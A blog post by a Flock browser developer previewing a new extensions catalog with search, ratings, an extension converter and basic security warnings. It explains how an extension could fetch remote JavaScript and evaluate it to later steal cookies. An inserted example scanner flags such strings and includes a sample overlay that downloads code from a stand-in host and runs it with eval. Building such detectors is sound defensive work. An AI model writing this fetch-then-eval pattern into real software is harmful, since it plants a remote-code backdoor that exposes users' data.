Six months or so ago, I wrote the current version of Flock’s extensions site. It’s pretty simple and was intended to be simple. It wound up being even simpler than originally planned and has plenty of functionality hidden because we haven’t had a need for it or the ability to support it. We’ve thought a lot about various approaches to making extensions available, and I blogged some of those thoughts a few months ago. The quick summary is that we were waffling over whether to enforce quality for Flock extensions by officially hosting only a few or whether to have a free-for-all, or whether to blend the approaches. We ultimately decided on a blended approach, and we planned to launch a new extensions site in early February with the launch of the 0.5 release of Flock. For various reasons, that didn’t pan out.

I visited Flock HQ last week, and we revisited the subject. The result? I’ve burned some midnight oil over the last few days and have built a draft of Flock’s new extensions site. It’s a Drupal module that I anticipate ultimately making public in the event that any community sites or similar projects wish to host extensions. Here’s what you can expect to see when it launches in (unless history’s a good indicator) a couple of weeks.

  • Search by (at least) keyword, locale, platform, and category.
  • See what Flock staffers recommend
  • Find extensions that get high ratings from the community, which presupposes…
  • One-click extensions ratings
  • Comment on extensions
  • Convert extensions that don’t already work in Flock

This last one was a fun little piece of code to write, and I want to talk about it for a minute because I’m frankly a little proud of the way it solves a few problems both on the community side and the administration side.

Converting extensions is nothing new. I wrote a command-line utility six months ago that was handy for batch-converting extensions, though not especially suitable for broad public use. I also started work on a web converter, but I never got a chance to finish it. Luckily, the community stood up and filled the need by writing various server and desktop programs to help individuals make extensions work in Flock and discover what extensions had already been converted. Further, for the would-have-been February launch of a new Flock web site (complete with extensions site), John Vandenberg did a lot of work and provided lots of valuable input for an extensions module in particular and on extensions conversion and management generally. So my building a module to convert extensions isn’t exactly trail-blazing. The module nevertheless solves several problems in a way that blends some of these approaches and that I think will add lots of value both for Flock users and for our staff.

So, how does it work? Say you’ve done a quick search for an extension and can’t find it on our site. You’ll be prompted to go to the extension conversion page, where you can either upload or paste the URL for the extension you’re looking for. The site then fetches the extension and reads in its meta-data. If it’s already in our database, the site updates a few fields. For example, it looks for locales and platforms the extension reports itself to be compatible with. So let’s say that someone else has previously uploaded the extension, but the version you upload supports more locales. Your action will update our record for the extension, making our meta-information that much more accurate. We also try to automatically figure out from the extension configuration who the author of the extension is, and, where possible, we provide “also by” information to help people find other extensions we’ve catalogued by a given author. It’s not perfect yet, but we’re heading in the right direction. And finally (among the goodies that give me a little thrill), we do some very basic security checks and provide a warning for extensions that do things that could potentially be dangerous. This merits some elaboration.

Over a year ago, I blogged about a major but necessary flaw in the Firefox extensions framework that makes it possible for extensions authors to write extensions that appear to be nice but that can morph over time into malicious extensions. All it takes is writing an extension that makes an XMLHttpRequest call to a remote server and evaluates the JavaScript string returned. Say I write an extension with broad appeal, and it makes such a call, and during the first week of deployment, the JavaScript returned by the server does useful and expected and non-malicious things. But after a week of gathering users, say I change the JavaScript returned by the server so that it reads your cookies and sends them to me or performs some other potentially nasty tasks. This is entirely possible, and it’s long fueled wariness on my part about installing extensions. The browser tells you only to install trusted extensions, but how many of us have even noticed that warning, much less paid it very much attention?

I don’t know of a way to address this issue fully, short of disabling extensions capability, which obviously won’t do. In order to help raise the security bar a little bit (not much, but every little bit helps), the new extensions catalog does a few rudimentary security checks. It looks for some potentially exploitable strings in extensions and produces a warning if they exist. In most cases, these will probably be false positives. For example, it’s perfectly valid and necessary for a del.icio.us extension to make XMLHttpRequest calls so that it can send and retrieve data to and from your del.icio.us account. Pretty much any extension that contacts a web service (read: every social networking extension) will cause the security flags to be raised. And it’s distinctly possible that users of our catalog will begin to ignore these warnings as readily as they ignore the browser’s warning about installing extensions. Every little flag or barrier to installing potentially malicious extensions helps, though, I think.
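A sketch of this kind of string check, added here as an illustration and not the catalog module's own code: the rule names, severities and both sample extensions are assumptions. It flags every XMLHttpRequest use at a low level (the expected false positives) and escalates only when the same file also evaluates strings as code.

```javascript
// Added example: rule ids, severities and sample files are assumptions,
// not the checks the Flock catalog actually performs.
const RULES = [
  { id: "network-request", re: /\bXMLHttpRequest\b/ },
  { id: "dynamic-eval", re: /\beval\s*\(|\bnew\s+Function\s*\(/ },
];

// Scan one unpacked extension, given as { path: sourceText }.
function scanExtension(files) {
  const findings = [];
  for (const [path, source] of Object.entries(files)) {
    if (!/\.(js|xul)$/i.test(path)) continue; // only script-bearing files
    const hit = new Set();
    source.split(/\r?\n/).forEach((text, i) => {
      for (const rule of RULES) {
        if (rule.re.test(text)) {
          hit.add(rule.id);
          findings.push({ path, line: i + 1, rule: rule.id, severity: "info" });
        }
      }
    });
    // Fetching data alone is usually benign; fetching and evaluating in the
    // same file is the morphing-extension pattern, so escalate that pair.
    if (hit.has("network-request") && hit.has("dynamic-eval")) {
      findings.push({ path, line: 0, rule: "remote-code-eval", severity: "warning" });
    }
  }
  return findings;
}

// Constructed sample input: a web-service client and a fetch-then-eval overlay.
const bookmarkSync = {
  "chrome/content/sync.js": [
    "var req = new XMLHttpRequest();",
    'req.open("GET", "https://api.example.invalid/bookmarks", true);',
    "req.onload = function () { render(JSON.parse(req.responseText)); };",
  ].join("\n"),
};
const morphing = {
  "chrome/content/overlay.js": [
    "var req = new XMLHttpRequest();",
    'req.open("GET", "https://updates.example.invalid/logic.js", false);',
    "req.send(null);",
    "eval(req.responseText);",
  ].join("\n"),
  "install.rdf": "<RDF/>",
};
console.log(scanExtension(bookmarkSync), scanExtension(morphing));
```

Matching strings this way misses anything obfuscated or split across lines, so the output supports a warning to the user and is not a verdict on the extension.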

So, there’s a preview of what should be coming soon at a revamped Flock site. We’ll recommend a few extensions, and others will be pretty easily browsable. As we begin to accumulate ratings and comments, we’ll try to expose better and better ways of finding the best extensions. The catalog we’ll be releasing will in some ways be a very rough draft with its various hiccups and sputters, but it should be an improvement on what’s out there now, and it will empower the community to port most extensions to work with Flock even if we don’t publish all ported extensions. The process will also be streamlined for Flock staffers, and I think we’re heading down a good path for all of us. Stay tuned.

